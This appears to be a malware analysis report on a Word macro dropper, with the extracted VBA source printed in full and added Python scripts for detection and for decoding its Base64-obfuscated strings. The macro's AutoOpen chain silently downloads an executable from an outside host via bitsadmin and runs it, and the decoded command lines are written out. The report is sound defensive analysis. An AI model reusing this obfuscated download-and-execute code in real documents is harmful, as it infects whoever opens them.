Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 72b68df10e943ad4…

MALICIOUS

Office (OLE)

Size: 97.5 KB
Created: 2018-10-08 17:58:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 7d54a816119f26953f47faf74645fca6
SHA-1: 735c879b1b8f026fb1e62937ec92ea228602c648
SHA-256: 72b68df10e943ad4bd87c22c19c1cfb45cd2c8f096878a7c20aab86dffe5641e
Risk score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample is a Word document in the legacy OLE (CFB) container carrying a VBA project. Its AutoOpen handler calls FreeDomToDraw, which rebuilds every string it needs from stacked Base64 literals (one to three decode passes each, through the macro's own Base64DecodeString helper over the standard alphabet) and then calls CreateObject on a ProgID that only exists at runtime, "WScript.shell". Decoding the literals in the extracted macros.bas gives the two hidden commands (window style 0, wait for exit) it runs in sequence: "cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND hxxp://www[.]adoveupdate365manager[.]co/FUvcr46546.exe %TEMP%\paint.exe", then, after a six-second GetTickCount/Sleep delay (Pause 6), "cmd /c %TEMP%\paint.exe". The " %temp%/" literal (Request) is decoded only after it has already been concatenated, so it never reaches the command line. The other procedures (highlightValue, highlightNegativeNumbers, UseFunction) are never called from AutoOpen and use the Excel object model (ActiveSheet, WorksheetFunction), so they are filler meant to dilute keyword-based triage. Beyond the techniques listed above, the bitsadmin download also maps to BITS Jobs (T1197). The ClamAV signature Doc.Dropper.Agent-6993379-0 is consistent with this download-and-execute dropper behaviour. Indicators to pivot on: the URL above, the dropped path %TEMP%\paint.exe, and the BITS job name SoftUpdate.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6993379-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6993379-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This heuristic is written for the case where no modern VBA project was recovered and no stronger macro-virus family marker was present; it is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. In this sample a VBA project was recovered (see the extracted macros.bas below), so the marker is redundant with OLE_VBA_AUTOOPEN here rather than independent evidence.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml  In document text (OLE body)
    All three are OOXML schema namespace URIs from embedded document XML and are benign. The actual download URL is present only Base64-encoded inside the macro, so the URL extractor does not surface it; it has to be recovered by decoding the macro strings.
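How the source-level heuristics above (auto-exec entry point, CreateObject call, auto-exec combined with shell/download/object-execution tokens) can be approximated on extracted VBA text, as an added Python example that is not the analysis platform's code. The two VBA snippets it scans are constructed, cut down from the macro listed under Extracted artifacts below, and the report's rule names are reused only as labels. It also shows the caveat this sample illustrates: a literal "WScript.Shell" token never appears in the source, so what fires is the CreateObject-with-a-variable pattern plus the .Run call, not the ProgID string.

```python
import re

# Auto-execution entry points Word/Excel invoke without user interaction.
AUTOEXEC_RE = re.compile(
    r"\b(?:AutoOpen|AutoExec|AutoClose|AutoNew|Auto_Open|Document_Open|Workbook_Open)\b",
    re.I,
)

# Shell / download / object-execution tokens. "WScript.Shell" is listed even
# though this sample never spells it out: it only exists after Base64 decoding.
EXEC_RES = [
    ("createobject", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("shell_function", re.compile(r"(?<![\w.])Shell\b", re.I)),
    ("wscript_shell_literal", re.compile(r"WScript\.Shell", re.I)),
    ("run_method", re.compile(r"\)\s*\.Run\b", re.I)),
    ("downloader", re.compile(
        r"\b(?:bitsadmin|URLDownloadToFile|XMLHTTP|ADODB\.Stream|powershell)\b", re.I)),
]

# CreateObject whose ProgID is a bare variable rather than a quoted literal:
# the ProgID is assembled at runtime, which is how this sample hides the
# WScript.Shell string from plain token matching.
NONLITERAL_PROGID_RE = re.compile(r"\bCreateObject\s*\(\s*[A-Za-z_]\w*\s*\)", re.I)

# Quoted runs over the standard Base64 alphabet (the one the macro's own Init
# sub builds), long enough to be unlikely identifiers.
B64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


def triage(vba: str) -> dict:
    """Score one extracted VBA module with the report's source-level rules;
    the labels in "hits" reuse the report's rule names."""
    autoexec = sorted({m.group(0) for m in AUTOEXEC_RE.finditer(vba)}, key=str.lower)
    exec_tokens = [name for name, rx in EXEC_RES if rx.search(vba)]
    hits = []
    if vba.strip():
        hits.append("OLE_VBA_MACROS")
    if autoexec:
        hits.append("OLE_VBA_AUTOOPEN")
    if "createobject" in exec_tokens:
        hits.append("OLE_VBA_CREATEOBJ")
    return {
        "hits": hits,
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        # The combination the p-code heuristic looks for, here applied to source text.
        "autoexec_exec_chain": bool(autoexec and exec_tokens),
        "nonliteral_progid": bool(NONLITERAL_PROGID_RE.search(vba)),
        "base64_literals": len(B64_LITERAL_RE.findall(vba)),
    }


# Constructed inputs: a cut-down version of the sample's AutoOpen chain and
# one of its Excel-flavoured filler routines.
MALICIOUS_VBA = '''
Sub FreeDomToDraw()
    FreeDom1 = Base64DecodeString("aHR0cDovL3d3dy5hZG92ZXVwZGF0ZTM2")
    FreeDomend = Base64DecodeString("V1Njcg==") + Base64DecodeString("aXB0LnNoZWxs")
    CreateObject(FreeDomend).Run (q + t + ""), 0, True
End Sub

Sub AutoOpen()
    FreeDomToDraw
End Sub
'''

FILLER_VBA = '''
Sub highlightNegativeNumbers()
Dim Rng As Range
For Each Rng In Selection
If WorksheetFunction.IsNumber(Rng) Then
If Rng.Value < 0 Then Rng.Font.Color = -16776961
End If
Next
End Sub
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_VBA), ("filler", FILLER_VBA)):
        print(label, triage(src))
```

The filler module scores only OLE_VBA_MACROS; the AutoOpen chain scores all three source rules, sets the auto-exec/exec combination, and flags the non-literal ProgID, while the "wscript_shell_literal" token stays silent exactly as it would on the real sample.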

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  9408 bytes
SHA-256: cecac8175f06305ba91e78730ec7e7dbe4e16b4ad394caa1c5a23bcf38525a12
Detection
ClamAV: No threats found (the Doc.Dropper.Agent-6993379-0 hit above is on the OLE container, not on the carved source)
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s), consistent with the Base64DecodeString calls that every string in FreeDomToDraw passes through.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
    Private Declare PtrSafe Function GetTickCount Lib "kernel32" () As Long



Private Sub Init()
   Dim C As Integer, I As Integer
   ' set Map1
   I = 0
   For C = Asc("A") To Asc("Z"): Map1(I) = C: I = I + 1: Next
   For C = Asc("a") To Asc("z"): Map1(I) = C: I = I + 1: Next
   For C = Asc("0") To Asc("9"): Map1(I) = C: I = I + 1: Next
   Map1(I) = Asc("+"): I = I + 1
   Map1(I) = Asc("/"): I = I + 1
   ' set Map2
   For I = 0 To 127: Map2(I) = 255: Next
   For I = 0 To 63: Map2(Map1(I)) = I: Next
   InitDone = True
   End Sub
Sub highlightValue()
Dim myStr As String
Dim myRg As Range
Dim myTxt As String
Dim myCell As Range
Dim myChar As String
Dim I As Long
Dim J As Long
On Error Resume Next
If ActiveWindow.RangeSelection.Count > 1 Then
myTxt = ActiveWindow.RangeSelection.AddressLocal
Else
myTxt = ActiveSheet.UsedRange.AddressLocal
End If
LInput: Set myRg = Application.InputBox("please select the data range:", "Selection Required", myTxt, , , , , 8)
If myRg Is Nothing Then
Exit Sub


End Sub




Public Sub Pause(Optional Timeout As Single = 5)
    Dim EndTick

 
    EndTick = GetTickCount() + Timeout * 1000
    Do While GetTickCount() <= EndTick
     
        DoEvents

     
        If EndTick - GetTickCount() > 1000 Then
           
            Sleep 1000
        End If
    Loop
End Sub
Sub highlightNegativeNumbers()
Dim Rng As Range
For Each Rng In Selection
If WorksheetFunction.IsNumber(Rng) Then
If Rng.Value < 0 Then
Rng.Font.Color = -16776961
End If
End If
Next
End Sub



Sub FreeDomToDraw()

    FreeDom1 = Base64DecodeString("aHR0cDovL3d3dy5hZG92ZXVwZGF0ZTM2")
     FreeDom11 = Base64DecodeString("NW1hbmFnZXIuY28vRlV2Y3I0NjU0Ni5leGU=")
 
  

  FreeDom13 = FreeDom1 + FreeDom11 + Request
  
  Request = Base64DecodeString("ICV0ZW1wJS8=")
  
       
Tpoutorightfloor = Base64DecodeString("WW1sMGMyRmtiV2x1SUM5MGNtRnVjMlpsY2lCVGIyWjBWWEJrWVhSbElDOWtidz09")



   TpRight = Base64DecodeString("U1VOV1ZWSlZNVkZLVm5oM1dWZHNkV1JETld4bFIxVm4=")

 TpRight = Base64DecodeString(TpRight)
  TpRight = Base64DecodeString(TpRight)

  Application.ScreenUpdating = False

RBKL = Base64DecodeString("TDNCeWFXOXlhWFI1SUVaUFVrVkhVazlWVGtRZw==")
RBKL = Base64DecodeString(RBKL)




   
    
      Tpoutorightfloor = Base64DecodeString(Tpoutorightfloor)
      
    
     
      
      FreeDom2 = Base64DecodeString("Yw==") + Base64DecodeString("bWQ=")
      FreeDom2VP = Base64DecodeString("IC9jIA==")
      
      FreeDomend = Base64DecodeString("V1Njcg==")
FreeDomend = FreeDomend + Base64DecodeString("aXB0LnNoZWxs")


      
      inFreeDom = Tpoutorightfloor + "wnload " + RBKL + FreeDom13
       

       q = FreeDom2 + FreeDom2VP
       t = inFreeDom + TpRight
  
  
    CreateObject(FreeDomend).Run (q + t + ""), 0, True

p = FreeDom2 + FreeDom2VP + TpRight + ""
      Pause (6)

CreateObject(FreeDomend).Run (p), 0, True



          



 
          
          
        
       
       
    
End Sub
Sub UseFunction()
 
 
 
MsgBox Application.WorksheetFunction.Combin(42, 6)
 
 
 
End Sub
 

Sub AutoOpen()
 With ActiveWindow
        .DisplayHorizontalScrollBar = True
        .DisplayVerticalScrollBar = True
    End With
        FreeDomToDraw
Application.ScreenUpdating = False

End Sub


Attribute VB_Name = "UserForm6"
Attribute VB_Base = "0{2D5F34A2-8514-4243-B5B1-5AEA8A8F29AD}{5FBBC783-6588-4BE4-A978-620D3CA9CAA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
... (truncated)
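The string-rebuilding chain in FreeDomToDraw above, reproduced as an added Python example that is not part of the report or of the sample. It copies the Base64 literals from the listing, applies the same number of Base64DecodeString passes the macro applies to each (one for most, two for Tpoutorightfloor and RBKL, three for TpRight), follows the macro's concatenation order, and returns the two command lines handed to WScript.Shell.Run plus the indicators an analyst would pull out. It assumes the macro's Base64DecodeString is plain standard Base64, which its Init sub (alphabet A-Z, a-z, 0-9, +, /) supports; the defang helper is an added convenience for report text.

```python
import base64

# Base64 literals copied from FreeDomToDraw in the extracted macros.bas,
# keyed by the macro variable they end up in, with the number of
# Base64DecodeString passes the macro applies to each.
LITERALS = {
    "FreeDom1": ("aHR0cDovL3d3dy5hZG92ZXVwZGF0ZTM2", 1),
    "FreeDom11": ("NW1hbmFnZXIuY28vRlV2Y3I0NjU0Ni5leGU=", 1),
    "Request": ("ICV0ZW1wJS8=", 1),
    "Tpoutorightfloor": (
        "WW1sMGMyRmtiV2x1SUM5MGNtRnVjMlpsY2lCVGIyWjBWWEJrWVhSbElDOWtidz09", 2),
    "TpRight": ("U1VOV1ZWSlZNVkZLVm5oM1dWZHNkV1JETld4bFIxVm4=", 3),
    "RBKL": ("TDNCeWFXOXlhWFI1SUVaUFVrVkhVazlWVGtRZw==", 2),
    "FreeDom2_c": ("Yw==", 1),
    "FreeDom2_md": ("bWQ=", 1),
    "FreeDom2VP": ("IC9jIA==", 1),
    "FreeDomend_a": ("V1Njcg==", 1),
    "FreeDomend_b": ("aXB0LnNoZWxs", 1),
}


def decode_layers(text: str, passes: int) -> str:
    """Standard Base64, applied `passes` times. The macro's Init sub builds
    the standard alphabet, so base64.b64decode matches Base64DecodeString."""
    for _ in range(passes):
        text = base64.b64decode(text).decode("ascii")
    return text


def reconstruct() -> dict:
    """Rebuild the strings and the two command lines the macro passes to
    WScript.Shell.Run, in the macro's own concatenation order."""
    v = {name: decode_layers(b64, n) for name, (b64, n) in LITERALS.items()}

    # FreeDom13 is built one line before Request is assigned, so Request is
    # still an empty Variant at that point and the "%temp%/" suffix never lands.
    url = v["FreeDom1"] + v["FreeDom11"]
    # "bitsadmin /transfer SoftUpdate /do" + "wnload " splits the verb in two.
    download = v["Tpoutorightfloor"] + "wnload " + v["RBKL"] + url
    prefix = v["FreeDom2_c"] + v["FreeDom2_md"] + v["FreeDom2VP"]   # "cmd /c "
    progid = v["FreeDomend_a"] + v["FreeDomend_b"]                    # "WScript.shell"

    stage1 = prefix + download + v["TpRight"] + ""   # .Run(..., 0, True): hidden, waits
    stage2 = prefix + v["TpRight"] + ""              # after Pause(6): run the dropped file
    return {
        "progid": progid,
        "url": url,
        "drop_path": v["TpRight"].strip(),
        "stage1": stage1,
        "stage2": stage2,
        "unused_request": v["Request"],
    }


def defang(s: str) -> str:
    """Report-safe rendering of a live URL: hxxp scheme and bracketed dots in the host."""
    scheme, _, rest = s.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


if __name__ == "__main__":
    r = reconstruct()
    print("ProgID  :", r["progid"])
    print("URL     :", defang(r["url"]))
    print("Dropped :", r["drop_path"])
    print("Stage 1 :", defang(r["stage1"]))
    print("Stage 2 :", r["stage2"])
```

Running this on the literals from the listing yields the bitsadmin download into %TEMP%\paint.exe as stage 1 and the bare execution of that file as stage 2; the double space in stage 2 and the orphaned " %temp%/" value are artefacts of the macro's own sloppiness, not of the decoder.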